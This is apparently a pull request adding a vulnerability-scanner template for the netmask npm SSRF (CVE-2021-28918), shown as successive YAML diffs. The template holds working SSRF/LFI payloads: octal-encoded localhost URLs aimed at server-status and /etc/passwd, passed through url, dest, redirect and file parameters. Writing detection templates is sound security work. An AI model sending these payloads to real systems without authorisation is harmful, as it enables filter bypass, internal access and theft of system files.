### PR TITLE
Create Netmask SSRF Template

### DIFF
--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -23,5 +23,5 @@ requests:
       - type: word
         words:
           - "Apache Server Status"
-          - "Server Version"  
-        part: body
+          - "Server Version"
+    part: body

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -21,7 +21,7 @@ requests:
         status:
           - 200
       - type: word
+        part: body
         words:
           - "Apache Server Status"
           - "Server Version"
-    part: body

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,0 +1,27 @@
+id: CVE-2021-28918
+
+info:
+  name: npm Netmask SSRF
+  author: johnjhacking
+  severity: high
+  reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
+  description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+  tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
+      - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status"
+      - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status"
+      - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Apache Server Status"
+          - "Server Version"  
+        part: body

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,14 +1,15 @@
 id: CVE-2021-28918
 
 info:
-  name: Netmask NPM Package <=v1.0.6 SSRF
+  name: Netmask NPM Package SSRF
   author: johnjhacking
   severity: critical
-  description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+  description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
   tags: cve,cve2021,npm,netmask,ssrf,lfi
   reference: |
       - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
       - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
+      - https://github.com/advisories/GHSA-pch5-whg9-qr2r
 
 requests:
   - method: GET

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,12 +1,14 @@
 id: CVE-2021-28918
 
 info:
-  name: npm Netmask SSRF
+  name: Netmask NPM Package <=v1.0.6 SSRF
   author: johnjhacking
-  severity: high
-  reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
+  severity: critical
   description: Improper input validation of octal strings in netmask npm package v1.0.6 and below allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
-  tags: cve,cve2021,npm,netmask,ssrf,rfi,lfi
+  tags: cve,cve2021,npm,netmask,ssrf,lfi
+  reference: |
+      - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
+      - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
 
 requests:
   - method: GET
@@ -15,13 +17,16 @@ requests:
       - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status"
       - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status"
       - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         part: body
         words:
           - "Apache Server Status"
           - "Server Version"
+        condition: and

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -7,9 +7,9 @@ info:
   description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
   tags: cve,cve2021,npm,netmask,ssrf,lfi
   reference:
-      - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
-      - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
-      - https://github.com/advisories/GHSA-pch5-whg9-qr2r
+    - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
+    - https://github.com/advisories/GHSA-pch5-whg9-qr2r
 
 requests:
   - method: GET

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,12 +1,12 @@
 id: CVE-2021-28918
 
 info:
-  name: Netmask npm Package SSRF
+  name: Netmask NPM Package SSRF
   author: johnjhacking
   severity: critical
   description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
   tags: cve,cve2021,npm,netmask,ssrf,lfi
-  reference: |
+  reference:
       - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
       - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
       - https://github.com/advisories/GHSA-pch5-whg9-qr2r
@@ -18,21 +18,16 @@ requests:
       - "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
       - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
 
-    matchers-condition: and
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
-      - type: status
-        status:
-          - 200
-          
       - type: word
         part: body
         words:
           - "Apache Server Status"
           - "Server Version"
         condition: and
-        
-      - type: word
-        part: body
-        words:
-          - "root:x:0:0:root:"
-        condition: or 
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

--- a/cves/2021/CVE-2021-28918.yaml
+++ b/cves/2021/CVE-2021-28918.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-28918
 
 info:
-  name: Netmask NPM Package SSRF
+  name: Netmask npm Package SSRF
   author: johnjhacking
   severity: critical
   description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
@@ -15,19 +15,24 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
-      - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status"
-      - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status"
-      - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status"
+      - "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
+      - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
-
+          
       - type: word
         part: body
         words:
           - "Apache Server Status"
           - "Server Version"
         condition: and
+        
+      - type: word
+        part: body
+        words:
+          - "root:x:0:0:root:"
+        condition: or 


### PR DESCRIPTION
The basic test to fuzz for the netmask SSRF vulnerability would be to use an Octal payload that resolves to the localhost. I limited it to 4 basic testing payloads as to not slow down the speed of a full-length CVE directories test.